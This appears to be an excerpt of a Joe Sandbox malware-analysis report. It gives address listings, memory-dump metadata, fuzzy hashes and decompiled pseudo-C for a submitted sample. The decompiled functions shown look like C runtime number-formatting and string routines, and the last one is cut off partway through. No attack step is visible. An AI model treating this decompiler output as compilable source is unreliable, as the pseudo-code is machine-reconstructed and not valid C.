                                                                                                                                                                                                                                                        0x7ff6e5acfbf0
                                                                                                                                                                                                                                                        0x7ff6e5acfbf7
                                                                                                                                                                                                                                                        0x7ff6e5acfbfa
                                                                                                                                                                                                                                                        0x7ff6e5acfc02
                                                                                                                                                                                                                                                        0x7ff6e5acfc04
                                                                                                                                                                                                                                                        0x7ff6e5acfc0b
                                                                                                                                                                                                                                                        0x7ff6e5acfc10
                                                                                                                                                                                                                                                        0x7ff6e5acfc14
                                                                                                                                                                                                                                                        0x7ff6e5acfc19
                                                                                                                                                                                                                                                        0x7ff6e5acfc1c
                                                                                                                                                                                                                                                        0x7ff6e5acfc1c
                                                                                                                                                                                                                                                        0x7ff6e5acfc23
                                                                                                                                                                                                                                                        0x7ff6e5acfc36
                                                                                                                                                                                                                                                        0x7ff6e5acfc3c
                                                                                                                                                                                                                                                        0x7ff6e5acfc45
                                                                                                                                                                                                                                                        0x7ff6e5acfc4f
                                                                                                                                                                                                                                                        0x7ff6e5acfc57
                                                                                                                                                                                                                                                        0x7ff6e5acfc5d
                                                                                                                                                                                                                                                        0x7ff6e5acfc61
                                                                                                                                                                                                                                                        0x7ff6e5acfc66
                                                                                                                                                                                                                                                        0x7ff6e5acfc74
                                                                                                                                                                                                                                                        0x7ff6e5acfc81
                                                                                                                                                                                                                                                        0x7ff6e5acfc88
                                                                                                                                                                                                                                                        0x7ff6e5acfc93
                                                                                                                                                                                                                                                        0x7ff6e5acfc9e
                                                                                                                                                                                                                                                        0x7ff6e5acfca2
                                                                                                                                                                                                                                                        0x7ff6e5acfca7
                                                                                                                                                                                                                                                        0x7ff6e5acfcba
                                                                                                                                                                                                                                                        0x7ff6e5acfcc3
                                                                                                                                                                                                                                                        0x7ff6e5acfcc7
                                                                                                                                                                                                                                                        0x7ff6e5acfccd
                                                                                                                                                                                                                                                        0x7ff6e5acfcd1
                                                                                                                                                                                                                                                        0x7ff6e5acfcd4
                                                                                                                                                                                                                                                        0x7ff6e5acfce5
                                                                                                                                                                                                                                                        0x7ff6e5acfce7
                                                                                                                                                                                                                                                        0x7ff6e5acfcef
                                                                                                                                                                                                                                                        0x7ff6e5acfcf5
                                                                                                                                                                                                                                                        0x7ff6e5acfcff
                                                                                                                                                                                                                                                        0x7ff6e5acfd06
                                                                                                                                                                                                                                                        0x7ff6e5acfd0b
                                                                                                                                                                                                                                                        0x7ff6e5acfd13
                                                                                                                                                                                                                                                        0x7ff6e5acfd1a
                                                                                                                                                                                                                                                        0x7ff6e5acfd1c
                                                                                                                                                                                                                                                        0x7ff6e5acfd24
                                                                                                                                                                                                                                                        0x7ff6e5acfd4a

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1010374628-0
                                                                                                                                                                                                                                                        • Opcode ID: 06bec88d588ec528f46b8898baac80e382627e1dcae42bef02aef7bc7040a1fe
                                                                                                                                                                                                                                                        • Instruction ID: 03c5d7ef8ba2814c9ae5c4fc10e58df19338ac812ec416e0b8e6d510f9a46bdd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06bec88d588ec528f46b8898baac80e382627e1dcae42bef02aef7bc7040a1fe
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89027D23B0D64245FB65AB1AA4703B92690AF46F90F544635DE5DCB3D2EF3EAC01831E
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACCC04(void* __rax, long long __rbx, unsigned int* __rcx, signed int* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long __r11, long long _a8, long long _a24, long long _a32, char* _a40, intOrPtr _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72, long long _a80) {
                                                                                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                                                                                        				long long _v48;
                                                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                                                                        				signed int _v72;
                                                                                                                                                                                                                                                        				signed long long _v80;
                                                                                                                                                                                                                                                        				long long _v88;
                                                                                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                                                                                        				intOrPtr _t80;
                                                                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                                                                        				char _t110;
                                                                                                                                                                                                                                                        				signed long long _t119;
                                                                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                                                                        				void* _t137;
                                                                                                                                                                                                                                                        				char* _t156;
                                                                                                                                                                                                                                                        				unsigned long long _t168;
                                                                                                                                                                                                                                                        				char* _t182;
                                                                                                                                                                                                                                                        				char* _t183;
                                                                                                                                                                                                                                                        				intOrPtr _t184;
                                                                                                                                                                                                                                                        				signed long long _t187;
                                                                                                                                                                                                                                                        				char* _t193;
                                                                                                                                                                                                                                                        				char* _t194;
                                                                                                                                                                                                                                                        				void* _t198;
                                                                                                                                                                                                                                                        				void* _t199;
                                                                                                                                                                                                                                                        				signed int* _t202;
                                                                                                                                                                                                                                                        				signed long long _t206;
                                                                                                                                                                                                                                                        				signed long long _t209;
                                                                                                                                                                                                                                                        				void* _t212;
                                                                                                                                                                                                                                                        				char* _t214;
                                                                                                                                                                                                                                                        				void* _t215;
                                                                                                                                                                                                                                                        				signed int* _t217;
                                                                                                                                                                                                                                                        				signed int* _t226;
                                                                                                                                                                                                                                                        				signed int* _t227;
                                                                                                                                                                                                                                                        				signed int* _t228;
                                                                                                                                                                                                                                                        				signed int* _t234;
                                                                                                                                                                                                                                                        				long long _t238;
                                                                                                                                                                                                                                                        				intOrPtr* _t240;
                                                                                                                                                                                                                                                        				unsigned int* _t241;
                                                                                                                                                                                                                                                        				void* _t242;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t238 = __r11;
                                                                                                                                                                                                                                                        				_t224 = __r8;
                                                                                                                                                                                                                                                        				_t219 = __rbp;
                                                                                                                                                                                                                                                        				_t213 = __rsi;
                                                                                                                                                                                                                                                        				_t202 = __rdx;
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_a24 = __rbp;
                                                                                                                                                                                                                                                        				_a32 = __rsi;
                                                                                                                                                                                                                                                        				r11d = 0;
                                                                                                                                                                                                                                                        				 *__rdx = r11b;
                                                                                                                                                                                                                                                        				_t119 =  >=  ? _a48 : r11d;
                                                                                                                                                                                                                                                        				_t182 = __rdx;
                                                                                                                                                                                                                                                        				_t241 = __rcx;
                                                                                                                                                                                                                                                        				_t5 = _t212 + 0xb; // 0xb
                                                                                                                                                                                                                                                        				if (__r8 - _t5 > 0) goto 0xe5accc7c;
                                                                                                                                                                                                                                                        				_t187 = _a80;
                                                                                                                                                                                                                                                        				_t7 = _t238 + 0x22; // 0x22
                                                                                                                                                                                                                                                        				_v80 = _t187;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				_v88 = __r11;
                                                                                                                                                                                                                                                        				 *((char*)(_t187 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t187 + 0x2c)) = _t7;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4(__rax, __rdx, _t187, __rdx, __rsi, __rbp, __r8);
                                                                                                                                                                                                                                                        				goto 0xe5accf7d;
                                                                                                                                                                                                                                                        				if (( *_t187 >> 0x00000034 & _t187) != _t187) goto 0xe5accd15;
                                                                                                                                                                                                                                                        				_t231 = __r9;
                                                                                                                                                                                                                                                        				_v48 = _a80;
                                                                                                                                                                                                                                                        				_v56 = _a72;
                                                                                                                                                                                                                                                        				_v64 = _a64;
                                                                                                                                                                                                                                                        				_t156 = _a40;
                                                                                                                                                                                                                                                        				_v72 = r11b;
                                                                                                                                                                                                                                                        				_v80 = _t119;
                                                                                                                                                                                                                                                        				_v88 = _t156;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ACCF9C(_t182, _t241, _t202, _t212, _t213, _t224, __r9) == 0) goto 0xe5accce4;
                                                                                                                                                                                                                                                        				 *_t182 = 0;
                                                                                                                                                                                                                                                        				goto 0xe5accf7d;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC618(_t73, _t7, 0x65, _t156, _t182, _t182, _t231);
                                                                                                                                                                                                                                                        				if (_t156 == 0) goto 0xe5accf7b;
                                                                                                                                                                                                                                                        				 *_t156 = ((_a56 ^ 0x00000001) << 5) + 0x50;
                                                                                                                                                                                                                                                        				 *((char*)(_t156 + 3)) = 0;
                                                                                                                                                                                                                                                        				goto 0xe5accf7b;
                                                                                                                                                                                                                                                        				if ( *_t241 - _t238 >= 0) goto 0xe5accd24;
                                                                                                                                                                                                                                                        				 *_t202 = 0x2d;
                                                                                                                                                                                                                                                        				_t183 = _t182 + 1;
                                                                                                                                                                                                                                                        				_t240 = _t183 + 1;
                                                                                                                                                                                                                                                        				r15d = 0x3ff;
                                                                                                                                                                                                                                                        				r13d = (_a56 ^ 0x00000001) & 0x000000ff;
                                                                                                                                                                                                                                                        				r8d = 0x30;
                                                                                                                                                                                                                                                        				if (( *_t241 & 0x00000000) != 0) goto 0xe5accd7b;
                                                                                                                                                                                                                                                        				 *_t183 = r8b;
                                                                                                                                                                                                                                                        				asm("dec ebp");
                                                                                                                                                                                                                                                        				r15d = r15d & 0x000003fe;
                                                                                                                                                                                                                                                        				goto 0xe5accd7e;
                                                                                                                                                                                                                                                        				 *_t183 = 0x31;
                                                                                                                                                                                                                                                        				_t214 = _t240 + 1;
                                                                                                                                                                                                                                                        				if (_t119 != 0) goto 0xe5accd8c;
                                                                                                                                                                                                                                                        				goto 0xe5accdc3;
                                                                                                                                                                                                                                                        				_t184 = _a80;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t184 + 0x28)) != r11b) goto 0xe5accdb3;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3A20( ~( *_t241 & 0xffffffff), _t184, _t184, _t214);
                                                                                                                                                                                                                                                        				r11d = 0;
                                                                                                                                                                                                                                                        				_t31 = _t238 + 0x30; // 0x30
                                                                                                                                                                                                                                                        				r8d = _t31;
                                                                                                                                                                                                                                                        				_t80 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x18)) + 0xf8))))));
                                                                                                                                                                                                                                                        				 *_t240 = _t80;
                                                                                                                                                                                                                                                        				if (( *_t241 & 0xffffffff) <= 0) goto 0xe5acce5a;
                                                                                                                                                                                                                                                        				if (_t119 <= 0) goto 0xe5acce11;
                                                                                                                                                                                                                                                        				_t81 = _t80 + r8w;
                                                                                                                                                                                                                                                        				_t137 = _t81 - 0x39;
                                                                                                                                                                                                                                                        				if (_t137 <= 0) goto 0xe5accdfe;
                                                                                                                                                                                                                                                        				 *_t214 = _t81 + (r13d << 5) + 7;
                                                                                                                                                                                                                                                        				_t120 = _t119 - 1;
                                                                                                                                                                                                                                                        				_t215 = _t214 + 1;
                                                                                                                                                                                                                                                        				if (_t137 >= 0) goto 0xe5accdde;
                                                                                                                                                                                                                                                        				goto 0xe5acce5a;
                                                                                                                                                                                                                                                        				r9d = _a72;
                                                                                                                                                                                                                                                        				r8d = r8w & 0xffff;
                                                                                                                                                                                                                                                        				_t83 = E00007FF67FF6E5ACD600(_t81 + (r13d << 5) + 7, _t7, _t184, _t241, 0 >> 4, _t212, _t215, _t219);
                                                                                                                                                                                                                                                        				r11d = 0;
                                                                                                                                                                                                                                                        				if (_t83 == 0) goto 0xe5acce7b;
                                                                                                                                                                                                                                                        				_t193 = _t215 - 1;
                                                                                                                                                                                                                                                        				_t110 =  *_t193;
                                                                                                                                                                                                                                                        				if (0x47 != 0) goto 0xe5acce44;
                                                                                                                                                                                                                                                        				 *_t193 = 0x30;
                                                                                                                                                                                                                                                        				_t194 = _t193 - 1;
                                                                                                                                                                                                                                                        				goto 0xe5acce33;
                                                                                                                                                                                                                                                        				if (_t194 == _t240) goto 0xe5acce57;
                                                                                                                                                                                                                                                        				if (_t110 != 0x39) goto 0xe5acce51;
                                                                                                                                                                                                                                                        				 *_t194 = _t110 + bpl + 1;
                                                                                                                                                                                                                                                        				goto 0xe5acce5a;
                                                                                                                                                                                                                                                        				 *((char*)(_t194 - 1)) =  *((char*)(_t194 - 1)) + 1;
                                                                                                                                                                                                                                                        				if (_t120 <= 0) goto 0xe5acce7b;
                                                                                                                                                                                                                                                        				r8d = _t120;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				r11d = 0;
                                                                                                                                                                                                                                                        				goto 0xe5acce80;
                                                                                                                                                                                                                                                        				_t217 =  ==  ? _t240 : _t215 + _t184;
                                                                                                                                                                                                                                                        				r13b = r13b << 5;
                                                                                                                                                                                                                                                        				r13b = r13b + 0x50;
                                                                                                                                                                                                                                                        				 *_t217 = r13b;
                                                                                                                                                                                                                                                        				_t234 =  &(_t217[0]);
                                                                                                                                                                                                                                                        				_t168 =  *_t241 >> 0x34;
                                                                                                                                                                                                                                                        				if ( *_t240 - r11b >= 0) goto 0xe5acceb3;
                                                                                                                                                                                                                                                        				_t198 = _t242 - _t168;
                                                                                                                                                                                                                                                        				_t44 = _t168 + 2; // 0x2d
                                                                                                                                                                                                                                                        				_t87 =  <  ? _t44 : 0x2b;
                                                                                                                                                                                                                                                        				_t217[0] =  <  ? _t44 : 0x2b;
                                                                                                                                                                                                                                                        				 *_t234 = dil;
                                                                                                                                                                                                                                                        				if (_t198 - 0x3e8 < 0) goto 0xe5accf07;
                                                                                                                                                                                                                                                        				_t226 =  &(_t234[0]);
                                                                                                                                                                                                                                                        				_t206 = (_t215 - _t242 >> 7) + (_t215 - _t242 >> 7 >> 0x3f);
                                                                                                                                                                                                                                                        				 *_t234 = _t212 + _t206;
                                                                                                                                                                                                                                                        				_t199 = _t198 + _t206 * 0xfffffc18;
                                                                                                                                                                                                                                                        				if (_t226 != _t234) goto 0xe5accf0d;
                                                                                                                                                                                                                                                        				if (_t199 - 0x64 < 0) goto 0xe5accf40;
                                                                                                                                                                                                                                                        				_t209 = (_t206 + _t199 >> 6) + (_t206 + _t199 >> 6 >> 0x3f);
                                                                                                                                                                                                                                                        				 *_t226 = _t212 + _t209;
                                                                                                                                                                                                                                                        				_t227 =  &(_t226[0]);
                                                                                                                                                                                                                                                        				if (_t227 != _t234) goto 0xe5accf46;
                                                                                                                                                                                                                                                        				if (_t199 + _t209 * 0xffffff9c - 0xa < 0) goto 0xe5accf71;
                                                                                                                                                                                                                                                        				 *_t227 = _t212 + (_t209 >> 2) + (_t209 >> 2 >> 0x3f);
                                                                                                                                                                                                                                                        				_t228 =  &(_t227[0]);
                                                                                                                                                                                                                                                        				 *_t228 = 0x367 + dil;
                                                                                                                                                                                                                                                        				_t228[0] = r11b;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}











































                                                                                                                                                                                                                                                        0x7ff6e5accc04
                                                                                                                                                                                                                                                        0x7ff6e5accc04
                                                                                                                                                                                                                                                        0x7ff6e5accc04
                                                                                                                                                                                                                                                        0x7ff6e5accc04
                                                                                                                                                                                                                                                        0x7ff6e5accc04
                                                                                                                                                                                                                                                        0x7ff6e5accc04
                                                                                                                                                                                                                                                        0x7ff6e5accc09
                                                                                                                                                                                                                                                        0x7ff6e5accc0e
                                                                                                                                                                                                                                                        0x7ff6e5accc27
                                                                                                                                                                                                                                                        0x7ff6e5accc2c
                                                                                                                                                                                                                                                        0x7ff6e5accc35
                                                                                                                                                                                                                                                        0x7ff6e5accc38
                                                                                                                                                                                                                                                        0x7ff6e5accc3b
                                                                                                                                                                                                                                                        0x7ff6e5accc3e
                                                                                                                                                                                                                                                        0x7ff6e5accc47
                                                                                                                                                                                                                                                        0x7ff6e5accc49
                                                                                                                                                                                                                                                        0x7ff6e5accc51
                                                                                                                                                                                                                                                        0x7ff6e5accc55
                                                                                                                                                                                                                                                        0x7ff6e5accc5a
                                                                                                                                                                                                                                                        0x7ff6e5accc5d
                                                                                                                                                                                                                                                        0x7ff6e5accc60
                                                                                                                                                                                                                                                        0x7ff6e5accc67
                                                                                                                                                                                                                                                        0x7ff6e5accc6b
                                                                                                                                                                                                                                                        0x7ff6e5accc70
                                                                                                                                                                                                                                                        0x7ff6e5accc77
                                                                                                                                                                                                                                                        0x7ff6e5accc8e
                                                                                                                                                                                                                                                        0x7ff6e5accc9c
                                                                                                                                                                                                                                                        0x7ff6e5accc9f
                                                                                                                                                                                                                                                        0x7ff6e5acccae
                                                                                                                                                                                                                                                        0x7ff6e5acccb9
                                                                                                                                                                                                                                                        0x7ff6e5acccbd
                                                                                                                                                                                                                                                        0x7ff6e5acccc5
                                                                                                                                                                                                                                                        0x7ff6e5acccca
                                                                                                                                                                                                                                                        0x7ff6e5acccce
                                                                                                                                                                                                                                                        0x7ff6e5acccda
                                                                                                                                                                                                                                                        0x7ff6e5acccdc
                                                                                                                                                                                                                                                        0x7ff6e5acccdf
                                                                                                                                                                                                                                                        0x7ff6e5acccec
                                                                                                                                                                                                                                                        0x7ff6e5acccf4
                                                                                                                                                                                                                                                        0x7ff6e5accd0a
                                                                                                                                                                                                                                                        0x7ff6e5accd0c
                                                                                                                                                                                                                                                        0x7ff6e5accd10
                                                                                                                                                                                                                                                        0x7ff6e5accd1d
                                                                                                                                                                                                                                                        0x7ff6e5accd1f
                                                                                                                                                                                                                                                        0x7ff6e5accd21
                                                                                                                                                                                                                                                        0x7ff6e5accd2b
                                                                                                                                                                                                                                                        0x7ff6e5accd31
                                                                                                                                                                                                                                                        0x7ff6e5accd37
                                                                                                                                                                                                                                                        0x7ff6e5accd3b
                                                                                                                                                                                                                                                        0x7ff6e5accd61
                                                                                                                                                                                                                                                        0x7ff6e5accd63
                                                                                                                                                                                                                                                        0x7ff6e5accd6f
                                                                                                                                                                                                                                                        0x7ff6e5accd72
                                                                                                                                                                                                                                                        0x7ff6e5accd79
                                                                                                                                                                                                                                                        0x7ff6e5accd7b
                                                                                                                                                                                                                                                        0x7ff6e5accd7e
                                                                                                                                                                                                                                                        0x7ff6e5accd85
                                                                                                                                                                                                                                                        0x7ff6e5accd8a
                                                                                                                                                                                                                                                        0x7ff6e5accd8c
                                                                                                                                                                                                                                                        0x7ff6e5accd98
                                                                                                                                                                                                                                                        0x7ff6e5accd9d
                                                                                                                                                                                                                                                        0x7ff6e5accda2
                                                                                                                                                                                                                                                        0x7ff6e5accdaf
                                                                                                                                                                                                                                                        0x7ff6e5accdaf
                                                                                                                                                                                                                                                        0x7ff6e5accdc1
                                                                                                                                                                                                                                                        0x7ff6e5accdc3
                                                                                                                                                                                                                                                        0x7ff6e5accdca
                                                                                                                                                                                                                                                        0x7ff6e5accde3
                                                                                                                                                                                                                                                        0x7ff6e5accdf1
                                                                                                                                                                                                                                                        0x7ff6e5accdf5
                                                                                                                                                                                                                                                        0x7ff6e5accdf9
                                                                                                                                                                                                                                                        0x7ff6e5accdfe
                                                                                                                                                                                                                                                        0x7ff6e5acce00
                                                                                                                                                                                                                                                        0x7ff6e5acce02
                                                                                                                                                                                                                                                        0x7ff6e5acce0d
                                                                                                                                                                                                                                                        0x7ff6e5acce0f
                                                                                                                                                                                                                                                        0x7ff6e5acce11
                                                                                                                                                                                                                                                        0x7ff6e5acce19
                                                                                                                                                                                                                                                        0x7ff6e5acce23
                                                                                                                                                                                                                                                        0x7ff6e5acce28
                                                                                                                                                                                                                                                        0x7ff6e5acce2d
                                                                                                                                                                                                                                                        0x7ff6e5acce2f
                                                                                                                                                                                                                                                        0x7ff6e5acce33
                                                                                                                                                                                                                                                        0x7ff6e5acce3a
                                                                                                                                                                                                                                                        0x7ff6e5acce3c
                                                                                                                                                                                                                                                        0x7ff6e5acce3f
                                                                                                                                                                                                                                                        0x7ff6e5acce42
                                                                                                                                                                                                                                                        0x7ff6e5acce47
                                                                                                                                                                                                                                                        0x7ff6e5acce4c
                                                                                                                                                                                                                                                        0x7ff6e5acce53
                                                                                                                                                                                                                                                        0x7ff6e5acce55
                                                                                                                                                                                                                                                        0x7ff6e5acce57
                                                                                                                                                                                                                                                        0x7ff6e5acce5c
                                                                                                                                                                                                                                                        0x7ff6e5acce5e
                                                                                                                                                                                                                                                        0x7ff6e5acce6e
                                                                                                                                                                                                                                                        0x7ff6e5acce76
                                                                                                                                                                                                                                                        0x7ff6e5acce79
                                                                                                                                                                                                                                                        0x7ff6e5acce84
                                                                                                                                                                                                                                                        0x7ff6e5acce88
                                                                                                                                                                                                                                                        0x7ff6e5acce8c
                                                                                                                                                                                                                                                        0x7ff6e5acce90
                                                                                                                                                                                                                                                        0x7ff6e5acce93
                                                                                                                                                                                                                                                        0x7ff6e5acce9a
                                                                                                                                                                                                                                                        0x7ff6e5acceab
                                                                                                                                                                                                                                                        0x7ff6e5acceb0
                                                                                                                                                                                                                                                        0x7ff6e5accebe
                                                                                                                                                                                                                                                        0x7ff6e5accec1
                                                                                                                                                                                                                                                        0x7ff6e5accec4
                                                                                                                                                                                                                                                        0x7ff6e5accec7
                                                                                                                                                                                                                                                        0x7ff6e5acced1
                                                                                                                                                                                                                                                        0x7ff6e5accedd
                                                                                                                                                                                                                                                        0x7ff6e5acceef
                                                                                                                                                                                                                                                        0x7ff6e5accef5
                                                                                                                                                                                                                                                        0x7ff6e5acceff
                                                                                                                                                                                                                                                        0x7ff6e5accf05
                                                                                                                                                                                                                                                        0x7ff6e5accf0b
                                                                                                                                                                                                                                                        0x7ff6e5accf28
                                                                                                                                                                                                                                                        0x7ff6e5accf2e
                                                                                                                                                                                                                                                        0x7ff6e5accf31
                                                                                                                                                                                                                                                        0x7ff6e5accf3e
                                                                                                                                                                                                                                                        0x7ff6e5accf44
                                                                                                                                                                                                                                                        0x7ff6e5accf64
                                                                                                                                                                                                                                                        0x7ff6e5accf67
                                                                                                                                                                                                                                                        0x7ff6e5accf74
                                                                                                                                                                                                                                                        0x7ff6e5accf77
                                                                                                                                                                                                                                                        0x7ff6e5accf9a

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: gfffffff
                                                                                                                                                                                                                                                        • API String ID: 0-1523873471
                                                                                                                                                                                                                                                        • Opcode ID: 24567b7b7ad9cc25883cfe86a0af8cdb31fb8148e1153fa934f37376d4be2ae6
                                                                                                                                                                                                                                                        • Instruction ID: 8cc8a72a1a43e7b2563a5daea8e9ef64b3044e1e8c87bcadb49d6a05e3646db0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24567b7b7ad9cc25883cfe86a0af8cdb31fb8148e1153fa934f37376d4be2ae6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33A12663B0878686EB21CB2990307A97B91AF55F84F098031DB5DCB795DF3ED901C706
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC6F98(long long __rbx, void* __rcx, void* __rdx, long long __rsi) {
                                                                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                                                                        				intOrPtr* _t53;
                                                                                                                                                                                                                                                        				signed long long _t55;
                                                                                                                                                                                                                                                        				void* _t72;
                                                                                                                                                                                                                                                        				long long _t85;
                                                                                                                                                                                                                                                        				intOrPtr* _t89;
                                                                                                                                                                                                                                                        				void* _t93;
                                                                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                                                                        				long long _t96;
                                                                                                                                                                                                                                                        				signed long long _t98;
                                                                                                                                                                                                                                                        				signed long long _t99;
                                                                                                                                                                                                                                                        				void* _t101;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t71 = __rdx;
                                                                                                                                                                                                                                                        				_t53 = _t89;
                                                                                                                                                                                                                                                        				 *((long long*)(_t53 + 0x10)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t53 + 0x18)) = _t85;
                                                                                                                                                                                                                                                        				 *((long long*)(_t53 + 0x20)) = __rsi;
                                                                                                                                                                                                                                                        				_t94 = __rdx;
                                                                                                                                                                                                                                                        				r13d = 0;
                                                                                                                                                                                                                                                        				 *((long long*)(_t53 + 8)) = _t96;
                                                                                                                                                                                                                                                        				_t14 = E00007FF67FF6E5AD0698();
                                                                                                                                                                                                                                                        				if (_t14 == 0) goto 0xe5ac6fe5;
                                                                                                                                                                                                                                                        				if (_t14 == 0x16) goto 0xe5ac71a1;
                                                                                                                                                                                                                                                        				goto 0xe5ac703a;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t89 - 0x30 + 0x60)) == 0) goto 0xe5ac703a;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD0738(0,  *((intOrPtr*)(_t89 - 0x30 + 0x60))) != 0) goto 0xe5ac7008;
                                                                                                                                                                                                                                                        				_t58 = _t96;
                                                                                                                                                                                                                                                        				goto 0xe5ac7071;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC72C0(_t96, _t96, __rdx,  *((intOrPtr*)(_t89 - 0x30 + 0x60)), _t101);
                                                                                                                                                                                                                                                        				if (_t53 == 0) goto 0xe5ac7032;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD0738(0, _t53) != 0) goto 0xe5ac7032;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t53, _t53);
                                                                                                                                                                                                                                                        				goto 0xe5ac7071;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t53, _t53);
                                                                                                                                                                                                                                                        				if (_t53 == 0) goto 0xe5ac7052;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD0738(0, _t53) != 0) goto 0xe5ac7052;
                                                                                                                                                                                                                                                        				goto 0xe5ac706e;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD0738(0, 0xe5ae1884) == 0) goto 0xe5ac706e;
                                                                                                                                                                                                                                                        				_t22 = E00007FF67FF6E5AC9E18(_t53, _t96);
                                                                                                                                                                                                                                                        				_t99 = _t98 | 0xffffffff;
                                                                                                                                                                                                                                                        				if (_t94 == 0) goto 0xe5ac7091;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t94 + (_t99 + 1) * 2)) != r13w) goto 0xe5ac7085;
                                                                                                                                                                                                                                                        				goto 0xe5ac7094;
                                                                                                                                                                                                                                                        				_t55 = _t99 + 1;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(0xe5ae1888 + _t55 * 2)) != r13w) goto 0xe5ac7097;
